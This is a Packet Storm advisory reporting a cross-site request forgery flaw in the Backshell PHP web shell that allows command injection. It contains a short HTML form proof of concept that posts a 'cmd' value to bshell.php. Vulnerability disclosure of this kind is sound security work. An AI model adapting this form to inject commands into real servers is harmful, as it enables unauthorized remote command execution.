Backshell Web Shell suffers from a cross site request forgery vulnerability.
e1667825acf8a9542de3584932040fd9b7faa17088c2d663c3f51ce4f779f9c5================================================================================
# Backshell Web Shell - CSRF Command Injection
================================================================================
# Vendor Homepage: https://github.com/neitanod/backshell
# Date: 25/12/2015
# Software Link: https://github.com/neitanod/backshell/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/bshell-csrf-rce.txt
================================================================================
# Exploit :
<form action="http://localhost/a/bshell.php" method="post">
<input type="hidden" name="cmd" value="mkdir ehsan">
<input type="submit" value="submit">
</form>
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed